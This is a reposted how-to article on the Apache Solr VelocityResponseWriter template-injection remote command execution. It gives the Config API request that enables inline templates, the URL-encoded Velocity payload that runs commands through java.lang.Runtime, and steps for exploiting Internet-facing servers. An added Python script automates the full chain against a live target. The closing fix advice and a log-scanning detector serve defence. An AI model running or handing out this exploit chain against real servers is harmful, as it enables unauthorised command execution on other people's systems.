2025-03-30 Update From: SLTechnology News&Howtos
Shulou(Shulou.com) 05/31 Report--
In this issue the editor presents a worked analysis of the remote command execution vulnerability caused by template injection in Apache Solr's VelocityResponseWriter. The article is detailed and written from a practitioner's point of view; I hope you take something away from it.
0x00 Preface
Today I saw someone in a group chat mention that an RCE PoC for Solr had been published on GitHub, so I immediately reproduced it to confirm that the PoC is real and works.
Introduction to Solr:
Solr is a standalone enterprise search server that exposes a web-service-like HTTP API. Users submit XML documents in a defined format to the server over HTTP to build an index, and issue search requests via HTTP GET, receiving the results in XML format.
0x01 Vulnerability details
Root cause:
An attacker who can reach the Solr admin interface directly can modify a core's configuration by sending a crafted POST request to the Config API.
Apache Solr ships the VelocityResponseWriter plugin. Its initialization parameter params.resource.loader.enabled controls whether the "params" resource loader may be used, that is, whether a Velocity template may be supplied inline in the Solr request parameters. The default is false.
When params.resource.loader.enabled is set to true, a request may specify which template to render. Velocity templates can call arbitrary Java methods, so an attacker can submit a crafted template that reaches java.lang.Runtime and executes commands on the server with the privileges of the Solr process.
Documentation of params.resource.loader.enabled:
https://lucene.apache.org/solr/guide/6_6/velocity-response-writer.html
Chinese version:
https://www.w3cschool.cn/solr_doc/solr_doc-umxd2h9z.html
0x02 Affected versions:
Believed to affect Solr 5 (not yet confirmed) up to the latest release at the time of writing.
0x03 Environment setup:
Environment:
Solr version: 8.2.0
Operating system: Windows
Setup steps:
Download a Solr release within the affected range; I use the latest version here, 8.2.0 (Solr needs a Java runtime, so install Java beforehand).
Extract the downloaded archive, change into Solr's bin directory and start Solr with the following command:
solr start -p 8983
Solr reports that it has started:
Verify by visiting it in the browser:
Create a core; this can be done from the web UI or from the command line.
Here I create it from the command line:
You can see the core was created successfully.
For creating a core from the web UI, see:
https://blog.csdn.net/weixin_39082031/article/details/78924909
Visit the core to verify it was created:
It has been created successfully!
0x04 Reproduction:
Local reproduction:
Visit the Solr site:
Note the core named test.
Open the core's config endpoint (/solr/test/config), view its configuration and search for the params.resource.loader.enabled parameter:
You can see that it is false by default.
We can turn params.resource.loader.enabled on by sending a crafted POST request.
POST packet:
POST /solr/test/config HTTP/1.1
Host: 172.26.1.173
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Content-Type: application/json
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 259

{"update-queryresponsewriter": {"startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true"}}
Example:
The response indicates that the configuration will be changed (that is, our modification takes effect afterwards).
We revisit the config endpoint:
You can see that our crafted request has successfully turned params.resource.loader.enabled on.
Use the payload from GitHub for command execution:
/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
Our target machine runs Windows, so replace id with a Windows command:
Internet-facing targets:
Find a target:
Obtain the name of the Solr core (the article calls it the node name):
Open the core's config endpoint:
Press Ctrl+F and search for params.resource.loader.enabled. If its value is true, the target is vulnerable!
If the value is false, you can change it to true by sending a POST request!
POST packet:
POST /solr/<core name obtained above>/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259

{"update-queryresponsewriter": {"startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true"}}
Once the parameter is true, use the PoC from GitHub directly:
/solr/<core name>/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
Send it as a plain GET request:
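The whole chain described above (read /config, flip params.resource.loader.enabled through the Config API only if it is still false, then request the Velocity template) as a small Python script. This is an added example, not the article's code and not the GitHub PoC author's code: the Velocity template is the public PoC the article uses, but the function names, the injectable send transport, the base URL 127.0.0.1:8983 and the FakeSolr stand-in (with its canned output for id) are assumptions made here so that the script runs offline. The config check also goes one step beyond the article's Ctrl+F: it inspects the /config JSON for any writer whose class is solr.VelocityResponseWriter, whichever name it was registered under.

```python
import json
import urllib.request
from urllib.parse import urlencode

# Velocity template from the public PoC the article uses. The empty string $x gives
# access to Class.forName(), through which java.lang.Runtime is obtained; the
# command's stdout is streamed back byte by byte as the response body.
# {cmd} is filled in by rce_query(); the template contains no other braces.
VELOCITY_RCE_TEMPLATE = (
    "#set($x='') "
    "#set($rt=$x.class.forName('java.lang.Runtime')) "
    "#set($chr=$x.class.forName('java.lang.Character')) "
    "#set($str=$x.class.forName('java.lang.String')) "
    "#set($ex=$rt.getRuntime().exec('{cmd}')) "
    "$ex.waitFor() "
    "#set($out=$ex.getInputStream()) "
    "#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end"
)


def rce_query(cmd: str) -> str:
    """Query string for /solr/<core>/select carrying the inline template."""
    if "'" in cmd:
        raise ValueError("single quotes would close the Velocity string literal")
    return urlencode({"q": "1", "wt": "velocity", "v.template": "custom",
                      "v.template.custom": VELOCITY_RCE_TEMPLATE.format(cmd=cmd)})


def enable_velocity_body() -> str:
    """Config API body from the article's POST packet: redefines the velocity
    writer with params.resource.loader.enabled=true."""
    return json.dumps({"update-queryresponsewriter": {
        "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter",
        "template.base.dir": "", "solr.resource.loader.enabled": "true",
        "params.resource.loader.enabled": "true"}})


def velocity_params_loader_enabled(config: dict) -> bool:
    """The article's Ctrl+F check, done on the /config JSON: writer definitions
    live under config.queryResponseWriter.<name>; the value may be a string or a bool."""
    writers = config.get("config", {}).get("queryResponseWriter", {})
    return any(
        spec.get("class") == "solr.VelocityResponseWriter"
        and str(spec.get("params.resource.loader.enabled", "false")).lower() == "true"
        for spec in writers.values() if isinstance(spec, dict))


def exploit(send, base_url: str, core: str, cmd: str) -> str:
    """Whole chain: read config, flip the flag via the Config API only if needed,
    then request the template. send(method, url, body) returns the response body."""
    cfg_url = f"{base_url}/solr/{core}/config"
    if not velocity_params_loader_enabled(json.loads(send("GET", cfg_url, None))):
        send("POST", cfg_url, enable_velocity_body())
    return send("GET", f"{base_url}/solr/{core}/select?{rce_query(cmd)}", None)


def urllib_send(method, url, body):
    """Live transport, for a lab target you are authorised to test."""
    data = body.encode() if body is not None else None
    headers = {"Content-Type": "application/json"} if data else {}
    req = urllib.request.Request(url, data=data, method=method, headers=headers)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode("utf-8", "replace")


class FakeSolr:
    """Constructed stand-in for the article's Solr 8.2.0 core 'test' so the chain
    runs offline. It starts with the default (false) and only renders the template
    once the Config API has switched the flag on, mirroring the real behaviour."""

    def __init__(self):
        self.params_loader = "false"
        self.requests = []

    def __call__(self, method, url, body):
        self.requests.append((method, url, body))
        if url.endswith("/config"):
            if method == "POST":
                self.params_loader = json.loads(body)["update-queryresponsewriter"][
                    "params.resource.loader.enabled"]
                return json.dumps({"responseHeader": {"status": 0}})
            return json.dumps({"responseHeader": {"status": 0}, "config": {"queryResponseWriter": {
                "json": {"class": "solr.JSONResponseWriter"},
                "velocity": {"class": "solr.VelocityResponseWriter", "startup": "lazy",
                             "params.resource.loader.enabled": self.params_loader}}}})
        if "wt=velocity" in url and self.params_loader == "true":
            return "uid=8983(solr) gid=8983(solr)\n"  # constructed output for the 'id' command
        return "<html>template rendering refused</html>"


if __name__ == "__main__":
    fake = FakeSolr()
    print(exploit(fake, "http://127.0.0.1:8983", "test", "id"), end="")
    print([m for m, _, _ in fake.requests])  # GET config, POST config, GET select
```

Against a real lab instance pass urllib_send instead of the fake. The order of requests the fake records (GET config, POST config, GET select) is also the footprint a defender should expect to find in the logs of a compromised core.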
0x05 Fix:
1. The project has not released a patch for this vulnerability yet (at the time of writing). Users are advised to enable login authentication on the Solr admin interface!
Block Internet access to the Solr admin interface!
2. Set params.resource.loader.enabled back to false (or remove the velocity response writer from the configuration entirely). On its own this is not enough: as shown above, anyone who can reach the Config API can switch it back on, so it must be combined with item 1.
3. Watch the Solr project for a fixed release and upgrade as soon as it is available.
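For the defensive side of the fix list, here is an added example (not from the article) that scans Solr's own solr.log request lines for the two steps of the attack reproduced above: hits on the Config API, and select requests with wt=velocity that carry an inline template using Java reflection. The o.a.s.c.S.Request line format is approximated from real Solr logs, and the three sample lines are constructed for this example, not captured from a real system.

```python
import re
from urllib.parse import parse_qs

# Matches the request line Solr writes to solr.log for every query. The format is
# approximated from real logs; the sample below is constructed, not captured.
REQUEST_RE = re.compile(
    r"o\.a\.s\.c\.S\.Request \[(?P<core>[^\]]*)\]\s+webapp=\S+ path=(?P<path>\S+) params=\{(?P<params>.*)\}")

# Java reflection / process-spawning primitives the PoC template relies on.
RCE_MARKERS = re.compile(r"class\.forName|getRuntime|ProcessBuilder|\.exec\(")


def analyze(line: str):
    """Return (core, path, findings) for one log line, or None if it is not a request line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # Solr logs the parameters URL-encoded, so parse_qs decodes %23set(...) for us.
    params = parse_qs(m["params"], keep_blank_values=True)
    findings = []
    if m["path"] == "/config":
        # Config API hit: this is how params.resource.loader.enabled gets flipped
        # to true. The body is not logged, so review it against change records.
        findings.append("config-api-request")
    if params.get("wt") == ["velocity"]:
        template = "".join(params.get("v.template.custom", []))
        if template or params.get("v.template") == ["custom"]:
            findings.append("velocity-inline-template")
        if RCE_MARKERS.search(template):
            findings.append("velocity-rce-payload")
    return m["core"], m["path"], findings


def scan(log_text: str):
    """Return the analysis of every line that produced at least one finding."""
    hits = []
    for line in log_text.splitlines():
        result = analyze(line)
        if result and result[2]:
            hits.append(result)
    return hits


# Constructed sample: a benign query, a Config API call, then the PoC request.
SAMPLE_LOG = """\
2019-10-31 14:02:11.001 INFO  (qtp1-14) [   x:test] o.a.s.c.S.Request [test]  webapp=/solr path=/select params={q=*:*&wt=json} hits=3 status=0 QTime=1
2019-10-31 14:02:40.532 INFO  (qtp1-17) [   x:test] o.a.s.c.S.Request [test]  webapp=/solr path=/config params={} status=0 QTime=88
2019-10-31 14:03:02.118 INFO  (qtp1-19) [   x:test] o.a.s.c.S.Request [test]  webapp=/solr path=/select params={q=1&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))} hits=0 status=0 QTime=240
"""

if __name__ == "__main__":
    for core, path, findings in scan(SAMPLE_LOG):
        print(f"core={core} path={path} findings={findings}")
```

A legitimate deployment that uses Velocity templates from disk will still trigger "velocity-inline-template" only if v.template.custom is actually sent, so the inline-template finding is a reasonable high-fidelity signal; the Config API finding is deliberately noisy and is meant to be correlated with the maintenance window in which a configuration change was expected.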
The above is the editor's worked analysis of the remote command execution vulnerability caused by template injection in Apache Solr's VelocityResponseWriter. If you have similar questions, you may find the analysis above useful. For more, follow the industry information channel.